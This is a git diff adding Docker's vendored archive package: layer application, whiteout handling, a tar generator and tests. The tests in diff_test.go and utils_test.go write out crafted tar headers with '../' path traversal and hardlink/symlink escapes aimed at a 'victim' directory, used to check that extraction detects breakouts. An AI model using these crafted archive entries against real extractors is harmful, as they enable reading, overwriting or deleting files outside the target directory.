+// ApplyUncompressedLayer parses a diff in the standard layer format from
+// `layer`, and applies it to the directory `dest`. The stream `layer`
+// can only be uncompressed.
+// Returns the size in bytes of the contents of the layer.
+func ApplyUncompressedLayer(dest string, layer io.Reader, options *TarOptions) (int64, error) {
+	return applyLayerHandler(dest, layer, options, false)
+}
+
+// do the bulk load of ApplyLayer, but allow for not calling DecompressStream
+func applyLayerHandler(dest string, layer io.Reader, options *TarOptions, decompress bool) (int64, error) {
+	dest = filepath.Clean(dest)
+
+	// We need to be able to set any perms
+	oldmask, err := system.Umask(0)
+	if err != nil {
+		return 0, err
+	}
+	defer system.Umask(oldmask) // ignore err, ErrNotSupportedPlatform
+
+	if decompress {
+		layer, err = DecompressStream(layer)
+		if err != nil {
+			return 0, err
+		}
+	}
+	return UnpackLayer(dest, layer, options)
+}
diff --git a/vendor/github.com/docker/docker/pkg/archive/diff_test.go b/vendor/github.com/docker/docker/pkg/archive/diff_test.go
new file mode 100644
index 0000000000..8167941ac0
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/archive/diff_test.go
@@ -0,0 +1,386 @@
+package archive
+
+import (
+	"archive/tar"
+	"io"
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"reflect"
+	"runtime"
+	"testing"
+
+	"github.com/docker/docker/pkg/ioutils"
+)
+
+func TestApplyLayerInvalidFilenames(t *testing.T) {
+	// TODO Windows: Figure out how to fix this test.
+	if runtime.GOOS == "windows" {
+		t.Skip("Passes but hits breakoutError: platform and architecture is not supported")
+	}
+	for i, headers := range [][]*tar.Header{
+		{
+			{
+				Name:     "../victim/dotdot",
+				Typeflag: tar.TypeReg,
+				Mode:     0644,
+			},
+		},
+		{
+			{
+				// Note the leading slash
+				Name:     "/../victim/slash-dotdot",
+				Typeflag: tar.TypeReg,
+				Mode:     0644,
+			},
+		},
+	} {
+		if err := testBreakout("applylayer", "docker-TestApplyLayerInvalidFilenames", headers); err != nil {
+			t.Fatalf("i=%d. %v", i, err)
+		}
+	}
+}
+
+func TestApplyLayerInvalidHardlink(t *testing.T) {
+	if runtime.GOOS == "windows" {
+		t.Skip("TypeLink support on Windows")
+	}
+	for i, headers := range [][]*tar.Header{
+		{ // try reading victim/hello (../)
+			{
+				Name:     "dotdot",
+				Typeflag: tar.TypeLink,
+				Linkname: "../victim/hello",
+				Mode:     0644,
+			},
+		},
+		{ // try reading victim/hello (/../)
+			{
+				Name:     "slash-dotdot",
+				Typeflag: tar.TypeLink,
+				// Note the leading slash
+				Linkname: "/../victim/hello",
+				Mode:     0644,
+			},
+		},
+		{ // try writing victim/file
+			{
+				Name:     "loophole-victim",
+				Typeflag: tar.TypeLink,
+				Linkname: "../victim",
+				Mode:     0755,
+			},
+			{
+				Name:     "loophole-victim/file",
+				Typeflag: tar.TypeReg,
+				Mode:     0644,
+			},
+		},
+		{ // try reading victim/hello (hardlink, symlink)
+			{
+				Name:     "loophole-victim",
+				Typeflag: tar.TypeLink,
+				Linkname: "../victim",
+				Mode:     0755,
+			},
+			{
+				Name:     "symlink",
+				Typeflag: tar.TypeSymlink,
+				Linkname: "loophole-victim/hello",
+				Mode:     0644,
+			},
+		},
+		{ // Try reading victim/hello (hardlink, hardlink)
+			{
+				Name:     "loophole-victim",
+				Typeflag: tar.TypeLink,
+				Linkname: "../victim",
+				Mode:     0755,
+			},
+			{
+				Name:     "hardlink",
+				Typeflag: tar.TypeLink,
+				Linkname: "loophole-victim/hello",
+				Mode:     0644,
+			},
+		},
+		{ // Try removing victim directory (hardlink)
+			{
+				Name:     "loophole-victim",
+				Typeflag: tar.TypeLink,
+				Linkname: "../victim",
+				Mode:     0755,
+			},
+			{
+				Name:     "loophole-victim",
+				Typeflag: tar.TypeReg,
+				Mode:     0644,
+			},
+		},
+	} {
+		if err := testBreakout("applylayer", "docker-TestApplyLayerInvalidHardlink", headers); err != nil {
+			t.Fatalf("i=%d. %v", i, err)
+		}
+	}
+}
+
+func TestApplyLayerInvalidSymlink(t *testing.T) {
+	if runtime.GOOS == "windows" {
+		t.Skip("TypeSymLink support on Windows")
+	}
+	for i, headers := range [][]*tar.Header{
+		{ // try reading victim/hello (../)
+			{
+				Name:     "dotdot",
+				Typeflag: tar.TypeSymlink,
+				Linkname: "../victim/hello",
+				Mode:     0644,
+			},
+		},
+		{ // try reading victim/hello (/../)
+			{
+				Name:     "slash-dotdot",
+				Typeflag: tar.TypeSymlink,
+				// Note the leading slash
+				Linkname: "/../victim/hello",
+				Mode:     0644,
+			},
+		},
+		{ // try writing victim/file
+			{
+				Name:     "loophole-victim",
+				Typeflag: tar.TypeSymlink,
+				Linkname: "../victim",
+				Mode:     0755,
+			},
+			{
+				Name:     "loophole-victim/file",
+				Typeflag: tar.TypeReg,
+				Mode:     0644,
+			},
+		},
+		{ // try reading victim/hello (symlink, symlink)
+			{
+				Name:     "loophole-victim",
+				Typeflag: tar.TypeSymlink,
+				Linkname: "../victim",
+				Mode:     0755,
+			},
+			{
+				Name:     "symlink",
+				Typeflag: tar.TypeSymlink,
+				Linkname: "loophole-victim/hello",
+				Mode:     0644,
+			},
+		},
+		{ // try reading victim/hello (symlink, hardlink)
+			{
+				Name:     "loophole-victim",
+				Typeflag: tar.TypeSymlink,
+				Linkname: "../victim",
+				Mode:     0755,
+			},
+			{
+				Name:     "hardlink",
+				Typeflag: tar.TypeLink,
+				Linkname: "loophole-victim/hello",
+				Mode:     0644,
+			},
+		},
+		{ // try removing victim directory (symlink)
+			{
+				Name:     "loophole-victim",
+				Typeflag: tar.TypeSymlink,
+				Linkname: "../victim",
+				Mode:     0755,
+			},
+			{
+				Name:     "loophole-victim",
+				Typeflag: tar.TypeReg,
+				Mode:     0644,
+			},
+		},
+	} {
+		if err := testBreakout("applylayer", "docker-TestApplyLayerInvalidSymlink", headers); err != nil {
+			t.Fatalf("i=%d. %v", i, err)
+		}
+	}
+}
+
+func TestApplyLayerWhiteouts(t *testing.T) {
+	// TODO Windows: Figure out why this test fails
+	if runtime.GOOS == "windows" {
+		t.Skip("Failing on Windows")
+	}
+
+	wd, err := ioutil.TempDir("", "graphdriver-test-whiteouts")
+	if err != nil {
+		return
+	}
+	defer os.RemoveAll(wd)
+
+	base := []string{
+		".baz",
+		"bar/",
+		"bar/bax",
+		"bar/bay/",
+		"baz",
+		"foo/",
+		"foo/.abc",
+		"foo/.bcd/",
+		"foo/.bcd/a",
+		"foo/cde/",
+		"foo/cde/def",
+		"foo/cde/efg",
+		"foo/fgh",
+		"foobar",
+	}
+
+	type tcase struct {
+		change, expected []string
+	}
+
+	tcases := []tcase{
+		{
+			base,
+			base,
+		},
+		{
+			[]string{
+				".bay",
+				".wh.baz",
+				"foo/",
+				"foo/.bce",
+				"foo/.wh..wh..opq",
+				"foo/cde/",
+				"foo/cde/efg",
+			},
+			[]string{
+				".bay",
+				".baz",
+				"bar/",
+				"bar/bax",
+				"bar/bay/",
+				"foo/",
+				"foo/.bce",
+				"foo/cde/",
+				"foo/cde/efg",
+				"foobar",
+			},
+		},
+		{
+			[]string{
+				".bay",
+				".wh..baz",
+				".wh.foobar",
+				"foo/",
+				"foo/.abc",
+				"foo/.wh.cde",
+				"bar/",
+			},
+			[]string{
+				".bay",
+				"bar/",
+				"bar/bax",
+				"bar/bay/",
+				"foo/",
+				"foo/.abc",
+				"foo/.bce",
+			},
+		},
+		{
+			[]string{
+				".abc",
+				".wh..wh..opq",
+				"foobar",
+			},
+			[]string{
+				".abc",
+				"foobar",
+			},
+		},
+	}
+
+	for i, tc := range tcases {
+		l, err := makeTestLayer(tc.change)
+		if err != nil {
+			t.Fatal(err)
+		}
+
+		_, err = UnpackLayer(wd, l, nil)
+		if err != nil {
+			t.Fatal(err)
+		}
+		err = l.Close()
+		if err != nil {
+			t.Fatal(err)
+		}
+
+		paths, err := readDirContents(wd)
+		if err != nil {
+			t.Fatal(err)
+		}
+
+		if !reflect.DeepEqual(tc.expected, paths) {
+			t.Fatalf("invalid files for layer %d: expected %q, got %q", i, tc.expected, paths)
+		}
+	}
+
+}
+
+func makeTestLayer(paths []string) (rc io.ReadCloser, err error) {
+	tmpDir, err := ioutil.TempDir("", "graphdriver-test-mklayer")
+	if err != nil {
+		return
+	}
+	defer func() {
+		if err != nil {
+			os.RemoveAll(tmpDir)
+		}
+	}()
+	for _, p := range paths {
+		if p[len(p)-1] == filepath.Separator {
+			if err = os.MkdirAll(filepath.Join(tmpDir, p), 0700); err != nil {
+				return
+			}
+		} else {
+			if err = ioutil.WriteFile(filepath.Join(tmpDir, p), nil, 0600); err != nil {
+				return
+			}
+		}
+	}
+	archive, err := Tar(tmpDir, Uncompressed)
+	if err != nil {
+		return
+	}
+	return ioutils.NewReadCloserWrapper(archive, func() error {
+		err := archive.Close()
+		os.RemoveAll(tmpDir)
+		return err
+	}), nil
+}
+
+func readDirContents(root string) ([]string, error) {
+	var files []string
+	err := filepath.Walk(root, func(path string, info os.FileInfo, err error) error {
+		if err != nil {
+			return err
+		}
+		if path == root {
+			return nil
+		}
+		rel, err := filepath.Rel(root, path)
+		if err != nil {
+			return err
+		}
+		if info.IsDir() {
+			rel = rel + "/"
+		}
+		files = append(files, rel)
+		return nil
+	})
+	if err != nil {
+		return nil, err
+	}
+	return files, nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/archive/example_changes.go b/vendor/github.com/docker/docker/pkg/archive/example_changes.go
new file mode 100644
index 0000000000..cedd46a408
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/archive/example_changes.go
@@ -0,0 +1,97 @@
+// +build ignore
+
+// Simple tool to create an archive stream from an old and new directory
+//
+// By default it will stream the comparison of two temporary directories with junk files
+package main
+
+import (
+	"flag"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"os"
+	"path"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/pkg/archive"
+)
+
+var (
+	flDebug  = flag.Bool("D", false, "debugging output")
+	flNewDir = flag.String("newdir", "", "")
+	flOldDir = flag.String("olddir", "", "")
+	log      = logrus.New()
+)
+
+func main() {
+	flag.Usage = func() {
+		fmt.Println("Produce a tar from comparing two directory paths. By default a demo tar is created of around 200 files (including hardlinks)")
+		fmt.Printf("%s [OPTIONS]\n", os.Args[0])
+		flag.PrintDefaults()
+	}
+	flag.Parse()
+	log.Out = os.Stderr
+	if (len(os.Getenv("DEBUG")) > 0) || *flDebug {
+		logrus.SetLevel(logrus.DebugLevel)
+	}
+	var newDir, oldDir string
+
+	if len(*flNewDir) == 0 {
+		var err error
+		newDir, err = ioutil.TempDir("", "docker-test-newDir")
+		if err != nil {
+			log.Fatal(err)
+		}
+		defer os.RemoveAll(newDir)
+		if _, err := prepareUntarSourceDirectory(100, newDir, true); err != nil {
+			log.Fatal(err)
+		}
+	} else {
+		newDir = *flNewDir
+	}
+
+	if len(*flOldDir) == 0 {
+		oldDir, err := ioutil.TempDir("", "docker-test-oldDir")
+		if err != nil {
+			log.Fatal(err)
+		}
+		defer os.RemoveAll(oldDir)
+	} else {
+		oldDir = *flOldDir
+	}
+
+	changes, err := archive.ChangesDirs(newDir, oldDir)
+	if err != nil {
+		log.Fatal(err)
+	}
+
+	a, err := archive.ExportChanges(newDir, changes)
+	if err != nil {
+		log.Fatal(err)
+	}
+	defer a.Close()
+
+	i, err := io.Copy(os.Stdout, a)
+	if err != nil && err != io.EOF {
+		log.Fatal(err)
+	}
+	fmt.Fprintf(os.Stderr, "wrote archive of %d bytes", i)
+}
+
+func prepareUntarSourceDirectory(numberOfFiles int, targetPath string, makeLinks bool) (int, error) {
+	fileData := []byte("fooo")
+	for n := 0; n < numberOfFiles; n++ {
+		fileName := fmt.Sprintf("file-%d", n)
+		if err := ioutil.WriteFile(path.Join(targetPath, fileName), fileData, 0700); err != nil {
+			return 0, err
+		}
+		if makeLinks {
+			if err := os.Link(path.Join(targetPath, fileName), path.Join(targetPath, fileName+"-link")); err != nil {
+				return 0, err
+			}
+		}
+	}
+	totalSize := numberOfFiles * len(fileData)
+	return totalSize, nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/archive/testdata/broken.tar b/vendor/github.com/docker/docker/pkg/archive/testdata/broken.tar
new file mode 100644
index 0000000000000000000000000000000000000000..8f10ea6b87d3eb4fed572349dfe87695603b10a5
GIT binary patch
literal 13824
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

literal 0
HcmV?d00001

diff --git a/vendor/github.com/docker/docker/pkg/archive/time_linux.go b/vendor/github.com/docker/docker/pkg/archive/time_linux.go
new file mode 100644
index 0000000000..3448569b1e
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/archive/time_linux.go
@@ -0,0 +1,16 @@
+package archive
+
+import (
+	"syscall"
+	"time"
+)
+
+func timeToTimespec(time time.Time) (ts syscall.Timespec) {
+	if time.IsZero() {
+		// Return UTIME_OMIT special value
+		ts.Sec = 0
+		ts.Nsec = ((1 << 30) - 2)
+		return
+	}
+	return syscall.NsecToTimespec(time.UnixNano())
+}
diff --git a/vendor/github.com/docker/docker/pkg/archive/time_unsupported.go b/vendor/github.com/docker/docker/pkg/archive/time_unsupported.go
new file mode 100644
index 0000000000..e85aac0540
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/archive/time_unsupported.go
@@ -0,0 +1,16 @@
+// +build !linux
+
+package archive
+
+import (
+	"syscall"
+	"time"
+)
+
+func timeToTimespec(time time.Time) (ts syscall.Timespec) {
+	nsec := int64(0)
+	if !time.IsZero() {
+		nsec = time.UnixNano()
+	}
+	return syscall.NsecToTimespec(nsec)
+}
diff --git a/vendor/github.com/docker/docker/pkg/archive/utils_test.go b/vendor/github.com/docker/docker/pkg/archive/utils_test.go
new file mode 100644
index 0000000000..01b9e92d1c
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/archive/utils_test.go
@@ -0,0 +1,166 @@
+package archive
+
+import (
+	"archive/tar"
+	"bytes"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"time"
+)
+
+var testUntarFns = map[string]func(string, io.Reader) error{
+	"untar": func(dest string, r io.Reader) error {
+		return Untar(r, dest, nil)
+	},
+	"applylayer": func(dest string, r io.Reader) error {
+		_, err := ApplyLayer(dest, r)
+		return err
+	},
+}
+
+// testBreakout is a helper function that, within the provided `tmpdir` directory,
+// creates a `victim` folder with a generated `hello` file in it.
+// `untar` extracts to a directory named `dest`, the tar file created from `headers`.
+//
+// Here are the tested scenarios:
+// - removed `victim` folder				(write)
+// - removed files from `victim` folder			(write)
+// - new files in `victim` folder			(write)
+// - modified files in `victim` folder			(write)
+// - file in `dest` with same content as `victim/hello` (read)
+//
+// When using testBreakout make sure you cover one of the scenarios listed above.
+func testBreakout(untarFn string, tmpdir string, headers []*tar.Header) error {
+	tmpdir, err := ioutil.TempDir("", tmpdir)
+	if err != nil {
+		return err
+	}
+	defer os.RemoveAll(tmpdir)
+
+	dest := filepath.Join(tmpdir, "dest")
+	if err := os.Mkdir(dest, 0755); err != nil {
+		return err
+	}
+
+	victim := filepath.Join(tmpdir, "victim")
+	if err := os.Mkdir(victim, 0755); err != nil {
+		return err
+	}
+	hello := filepath.Join(victim, "hello")
+	helloData, err := time.Now().MarshalText()
+	if err != nil {
+		return err
+	}
+	if err := ioutil.WriteFile(hello, helloData, 0644); err != nil {
+		return err
+	}
+	helloStat, err := os.Stat(hello)
+	if err != nil {
+		return err
+	}
+
+	reader, writer := io.Pipe()
+	go func() {
+		t := tar.NewWriter(writer)
+		for _, hdr := range headers {
+			t.WriteHeader(hdr)
+		}
+		t.Close()
+	}()
+
+	untar := testUntarFns[untarFn]
+	if untar == nil {
+		return fmt.Errorf("could not find untar function %q in testUntarFns", untarFn)
+	}
+	if err := untar(dest, reader); err != nil {
+		if _, ok := err.(breakoutError); !ok {
+			// If untar returns an error unrelated to an archive breakout,
+			// then consider this an unexpected error and abort.
+			return err
+		}
+		// Here, untar detected the breakout.
+		// Let's move on verifying that indeed there was no breakout.
+		fmt.Printf("breakoutError: %v\n", err)
+	}
+
+	// Check victim folder
+	f, err := os.Open(victim)
+	if err != nil {
+		// codepath taken if victim folder was removed
+		return fmt.Errorf("archive breakout: error reading %q: %v", victim, err)
+	}
+	defer f.Close()
+
+	// Check contents of victim folder
+	//
+	// We are only interested in getting 2 files from the victim folder, because if all is well
+	// we expect only one result, the `hello` file. If there is a second result, it cannot
+	// hold the same name `hello` and we assume that a new file got created in the victim folder.
+	// That is enough to detect an archive breakout.
+	names, err := f.Readdirnames(2)
+	if err != nil {
+		// codepath taken if victim is not a folder
+		return fmt.Errorf("archive breakout: error reading directory content of %q: %v", victim, err)
+	}
+	for _, name := range names {
+		if name != "hello" {
+			// codepath taken if new file was created in victim folder
+			return fmt.Errorf("archive breakout: new file %q", name)
+		}
+	}
+
+	// Check victim/hello
+	f, err = os.Open(hello)
+	if err != nil {
+		// codepath taken if read permissions were removed
+		return fmt.Errorf("archive breakout: could not lstat %q: %v", hello, err)
+	}
+	defer f.Close()
+	b, err := ioutil.ReadAll(f)
+	if err != nil {
+		return err
+	}
+	fi, err := f.Stat()
+	if err != nil {
+		return err
+	}
+	if helloStat.IsDir() != fi.IsDir() ||
+		// TODO: cannot check for fi.ModTime() change
+		helloStat.Mode() != fi.Mode() ||
+		helloStat.Size() != fi.Size() ||
+		!bytes.Equal(helloData, b) {
+		// codepath taken if hello has been modified
+		return fmt.Errorf("archive breakout: file %q has been modified. Contents: expected=%q, got=%q. FileInfo: expected=%#v, got=%#v", hello, helloData, b, helloStat, fi)
+	}
+
+	// Check that nothing in dest/ has the same content as victim/hello.
+	// Since victim/hello was generated with time.Now(), it is safe to assume
+	// that any file whose content matches exactly victim/hello, managed somehow
+	// to access victim/hello.
+	return filepath.Walk(dest, func(path string, info os.FileInfo, err error) error {
+		if info.IsDir() {
+			if err != nil {
+				// skip directory if error
+				return filepath.SkipDir
+			}
+			// enter directory
+			return nil
+		}
+		if err != nil {
+			// skip file if error
+			return nil
+		}
+		b, err := ioutil.ReadFile(path)
+		if err != nil {
+			// Houston, we have a problem. Aborting (space)walk.
+			return err
+		}
+		if bytes.Equal(helloData, b) {
+			return fmt.Errorf("archive breakout: file %q has been accessed via %q", hello, path)
+		}
+		return nil
+	})
+}
diff --git a/vendor/github.com/docker/docker/pkg/archive/whiteouts.go b/vendor/github.com/docker/docker/pkg/archive/whiteouts.go
new file mode 100644
index 0000000000..d20478a10d
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/archive/whiteouts.go
@@ -0,0 +1,23 @@
+package archive
+
+// Whiteouts are files with a special meaning for the layered filesystem.
+// Docker uses AUFS whiteout files inside exported archives. In other
+// filesystems these files are generated/handled on tar creation/extraction.
+
+// WhiteoutPrefix prefix means file is a whiteout. If this is followed by a
+// filename this means that file has been removed from the base layer.
+const WhiteoutPrefix = ".wh."
+
+// WhiteoutMetaPrefix prefix means whiteout has a special meaning and is not
+// for removing an actual file. Normally these files are excluded from exported
+// archives.
+const WhiteoutMetaPrefix = WhiteoutPrefix + WhiteoutPrefix
+
+// WhiteoutLinkDir is a directory AUFS uses for storing hardlink links to other
+// layers. Normally these should not go into exported archives and all changed
+// hardlinks should be copied to the top layer.
+const WhiteoutLinkDir = WhiteoutMetaPrefix + "plnk"
+
+// WhiteoutOpaqueDir file means directory has been made opaque - meaning
+// readdir calls to this directory do not follow to lower layers.
+const WhiteoutOpaqueDir = WhiteoutMetaPrefix + ".opq"
diff --git a/vendor/github.com/docker/docker/pkg/archive/wrap.go b/vendor/github.com/docker/docker/pkg/archive/wrap.go
new file mode 100644
index 0000000000..b39d12c878
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/archive/wrap.go
@@ -0,0 +1,59 @@
+package archive
+
+import (
+	"archive/tar"
+	"bytes"
+	"io"
+)
+
+// Generate generates a new archive from the content provided
+// as input.
+//
+// `files` is a sequence of path/content pairs. A new file is
+// added to the archive for each pair.
+// If the last pair is incomplete, the file is created with an
+// empty content. For example:
+//
+// Generate("foo.txt", "hello world", "emptyfile")
+//
+// The above call will return an archive with 2 files:
+//  * ./foo.txt with content "hello world"
+//  * ./empty with empty content
+//
+// FIXME: stream content instead of buffering
+// FIXME: specify permissions and other archive metadata
+func Generate(input ...string) (io.Reader, error) {
+	files := parseStringPairs(input...)
+	buf := new(bytes.Buffer)
+	tw := tar.NewWriter(buf)
+	for _, file := range files {
+		name, content := file[0], file[1]
+		hdr := &tar.Header{
+			Name: name,
+			Size: int64(len(content)),
+		}
+		if err := tw.WriteHeader(hdr); err != nil {
+			return nil, err
+		}
+		if _, err := tw.Write([]byte(content)); err != nil {
+			return nil, err
+		}
+	}
+	if err := tw.Close(); err != nil {
+		return nil, err
+	}
+	return buf, nil
+}
+
+func parseStringPairs(input ...string) (output [][2]string) {
+	output = make([][2]string, 0, len(input)/2+1)
+	for i := 0; i < len(input); i += 2 {
+		var pair [2]string
+		pair[0] = input[i]
+		if i+1 < len(input) {
+			pair[1] = input[i+1]
+		}
+		output = append(output, pair)
+	}
+	return
+}
